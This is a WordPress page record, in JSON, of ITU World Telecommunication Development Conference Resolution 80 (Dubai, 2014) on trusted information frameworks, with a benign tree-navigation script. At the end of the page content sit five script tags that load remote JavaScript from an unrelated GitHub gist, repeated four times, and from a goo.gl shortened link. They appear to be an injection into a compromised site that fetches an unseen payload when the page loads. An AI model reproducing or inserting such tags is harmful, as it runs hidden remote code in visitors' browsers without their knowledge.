{"id":1651,"date":"2015-06-30T11:59:51","date_gmt":"2015-06-30T15:59:51","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=1651"},"modified":"2015-06-30T11:59:51","modified_gmt":"2015-06-30T15:59:51","slug":"wtdc-2014_80","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/wtdc\/wtdc-2014\/wtdc-2014_80\/","title":{"rendered":"WTDC Resolution 80"},"content":{"rendered":"<p><style type=\"text\/css\">\nbody {}\n\n:link { color: #0000ff; text-decoration:none;}\n:visited { color: #6666ff; text-decoration:none; }\na:active { color: #0000ff; text-decoration:none;}\na:hover {color: #0000ff; text-decoration:underline; }\n\ndiv.basetext {}\n\ndiv.basetop {}\n\nh1 {\n    text-align:center;\n}\n\nspan.h2 {}\n\ndiv.year {}\n\ndiv.form {}\n\nspan.cpt {}\n\nspan.cm {}\n\n.fl {}\n\nul {}\n\nli {}\n\nul li {\n\tlist-style:square;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n\nli.basic {\n\tlist-style:square;\n\tlist-style-image:none;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\nspan.links {\n}\n\n\n\n\n.sub { display: none; }\n.subexp {display: block; }\n.sub { display: none; } \n\n.subexp {display: block; } \n\nli.exp {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.col {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.exp_active {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;  \n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer;\n}\n\nli.col_active {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer; \/* if not included, bullets are not shown right in moz*\/\n}\n\n\nli.basic_active {\n  list-style:square;\n  list-style-image:none;\n  background-color:#eeeeff;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\n\/* the 'boxed' and 'attributes' styles are used to display notes and attributes\n*\/\n\n.boxed,.nodecontent {display:inline;}\n.boxed .note-and-attributes {display:none;}\n\n.boxed:hover .note-and-attributes {\n\tposition:fixed; top:2em;right:10px;z-index:3;\n\tdisplay:block;\n\tmin-width:33%;\n\tmax-width:60%;\n\tmax-height:95%;\n\tcolor:black;\n\tbackground:#ffffff;\n\tfont:normal 16px courier, sans-serif;\n\tborder:1px solid black;\n\tpadding:10px;\n}\n\n.note:before {\n\tcontent:\"NOTE: \";\n\tfont-weight:bold;\n}\n\ntable.attributes {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable.attributes td,th {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\ntable.attributes th {\n\ttext-align:center;\n}\ntable.attributes caption {\n\tmargin-top:1em;\n\tfont-style:italic;\n\ttext-align:center;\n}\n\/* Thanks to wolfgangradke, https:\/\/sourceforge.net\/forum\/message.php?msg_id=5991663 *\/\ndiv.nodecontent > p {\n\tmargin-top:0pt;\n\tmargin-bottom:0pt;\n\tdisplay:inline;\n}\n\np + p { \n \tmargin-top: 0.5em !important;\n\tdisplay:block !important;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747128&group_id=7118*\/\ntable {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable td {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747000&group_id=7118*\/\nol {\n\tmargin-top:1px;\n    margin-bottom:1px;\n\tmargin-left:0px;\n\tpadding-left:3%;\n}\n\nol li {\n\tlist-style:decimal;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n<\/style><br \/>\n<script type=\"text\/javascript\">\r\n\/* MarkTree JavaScript code\r\n * \r\n * Distributed under the terms of the MIT License.\r\n * See \"LICENCE.MIT\" or http:\/\/www.opensource.org\/licenses\/mit-license.php for details.\r\n *\r\n * Software distributed under the License is distributed on an \"AS IS\" basis,\r\n * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License\r\n * for the specific language governing rights and limitations under the\r\n * License.\r\n * \r\n * Miika Nurminen, 12.7.2004.\r\n *\/\r\n\r\n\/* cross-browser (tested with ie5, mozilla 1 and opera 5) keypress detection *\/\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u2030vi\u2030 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/script><\/p>\n<h3><span style=\"\">WTDC RESOLUTION 80 (Dubai, 2014)<\/span><\/h3>\n<h4><span style=\"\">Establishing and promoting trusted information frameworks in developing countries to facilitate and encourage electronic information exchanges between economic partners<\/span><\/h4>\n<p><span style=\"\">The World Telecommunication Development Conference (Dubai, 2014),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\" id=\"FMID_383777409FM\">\n<div class=\"nodecontent\">recalling<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a) Resolution 135 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference, on ITU&#8217;s role in the development of telecommunications\/information and communication technologies (ICTs), in providing technical assistance and advice to developing countries and in implementing relevant national, regional and interregional projects;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b) Resolution 181 (Guadalajara, 2010) of the Plenipotentiary Conference, on definitions and terminology relating to building confidence and security in the use of ICTs;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c) Resolution 71 (Rev. Dubai, 2014) of this conference, on strengthening cooperation between Member States and Sector Members of the ITU Telecommunication Development Sector (ITU\u2011D), including the private sector;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d) Resolution 74 (Hyderabad, 2010) of the World Telecommunication Development Conference (WTDC), on more effective adoption of e\u2011government services;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e) Resolution 50 (Rev. Dubai, 2014) of this conference, on optimal integration of ICTs;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">f) Resolution 48 (Rev. Hyderabad, 2010) of WTDC, on strengthening cooperation among telecommunication regulators;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">g) Resolution 54 (Rev. Dubai, 2014) of this conference, on ICT applications;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">h) Resolution 45 (Rev. Dubai, 2014) of this conference, on mechanisms for enhancing cooperation on cybersecurity, including countering and combating spam,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" id=\"FMID_712375103FM\">\n<div class=\"nodecontent\">considering<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a) current difficulties in establishing business partnerships in developing countries;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b) the important role that national telecommunication\/ICT policy can play in stimulating innovation and investment in new technologies;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c) the sovereign right of each country to establish its national telecommunication\/ICT priorities and policies;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d) the importance of telecommunication networks and ICT infrastructure for economic development;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e) that the amount of electronic information being exchanged by developing countries at national and regional levels is low, but its development potential is undeniable;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">f) the potential for broader access to a range of telecommunication\/ICT applications and services that are readily available to facilitate economic development;<\/div>\n<\/li>\n<li class=\"col\">\n<div class=\"nodecontent\">g) that the World Summit on the Information Society (WSIS) adopted specific action lines in its Plan of Action, including in particular:<\/div>\n<ul class=\"subexp\">\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013 Action Line C1: The role of governments and all stakeholders in the promotion of ICTs for development<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013 Action Line C2: Information and communication infrastructure: An essential foundation for the information society<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013 Action Line C5: Building confidence and security in the use of ICTs<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013 Action Line C6: Enabling environment<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013 Action Line C7: ICT applications: Benefits in all aspects of life,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" id=\"FMID_700840044FM\">\n<div class=\"nodecontent\">noting<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a) the adoption and implementation of the Hyderabad Action Plan (WTDC\u201110), which incorporated provisions on the development of telecommunication\/ICT services in developing countries through various programmes, in particular Programme 2 on cybersecurity, ICT applications and IP-based network-related issues and Programme 3 on the enabling environment;<\/div>\n<\/li>\n<li class=\"col\">\n<div class=\"nodecontent\">b) that this conference has reaffirmed, in its Declaration and resolutions, a commitment to:<\/div>\n<ul class=\"subexp\">\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013 foster international cooperation on telecommunication\/ICT development issues;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013 create an enabling environment conducive to telecommunication\/ICT development;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013 enhance confidence and security in the use of telecommunications\/ICTs, and roll-out of relevant applications and services,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">recognizing<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a) that effective deployment and use of ICTs is an important factor in implementing social and economic development programmes, especially in developing countries;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b) the low level of electronic communications and economic information exchanges at the regional level within and between the developing countries;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)that ICTs have helped to transform business models and organizational structures in countries and are thus a key asset for an enterprise or a country in becoming integrated into the new global economy;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d) that the establishment of trusted information frameworks between economic partners will increase confidence in, and encourage the use of, electronic information exchanges, and will be a key factor in future growth of the digital economy at the global level;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e) the work already being carried out by other international and private-sector organizations in the fields of trusted information frameworks and electronic commerce,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">conscious<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a) that the modernization of telecommunication networks and the development of services and applications associated with ICTs in these countries will be an important factor in their economic development and will offer them an opportunity to lay the foundations of an inclusive information society;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b) of the potential beneficial impact for developing countries of the establishment of trusted information frameworks to facilitate the exchange of electronic information in the world of business and, in particular, their importance to actors involved in the digital economy;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c) that the removal of existing obstacles to the development of electronic information exchanges in the developing countries depends on establishing trusted information frameworks that encourage the creation of new regional partnerships between administrations, businesses and individuals;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d) of the need to establish trusted information frameworks based on global standards and best practices to facilitate regional and international interoperability of electronic information exchange mechanisms,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">resolves<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">that relevant ITU\u2011D and ITU Telecommunication Standardization Sector (ITU\u2011T) study groups, to the extent possible, take into account the aims of this resolution in studies under Questions pertaining to ICT applications,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">instructs the Director of the Telecommunication Development Bureau<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1 to act as a catalyst in enhancing international and regional cooperation among Member States, especially regarding the use of ICT applications and services to facilitate electronic information exchanges between economic partners;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2 to invite Study Group 2 to take into account the aims of this resolution when studying the new Question on Creating the smart society: Social and economic development through ICT applications;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3 to assist developing countries to take advantage of resources and services provided by the private sector and relevant organizations at the regional and international levels on global standards and best practices for establishing trusted information frameworks and mechanisms that facilitate electronic information exchanges between economic partners,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">invites Member States and Sector Members<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1 to encourage the creation of an enabling framework for international and regional partnership in which countries identify their needs in terms of electronic exchanges of economic information, and assess the feasibility of associated operational and technical interoperability frameworks;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2 to organize forums and workshops, at regional and international level, dealing with aspects of the development of trusted information frameworks for electronic exchange of economic information based on global standards and best practices.<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WTDC RESOLUTION 80 (Dubai, 2014) Establishing and promoting trusted information frameworks in developing countries to facilitate and encourage electronic information exchanges between economic partners The World Telecommunication Development Conference (Dubai, 2014), recalling a) Resolution 135 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference, on ITU&#8217;s role in the development of telecommunications\/information and communication technologies (ICTs), in [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1580,"menu_order":80,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-1651","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1651","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=1651"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1651\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1580"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=1651"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}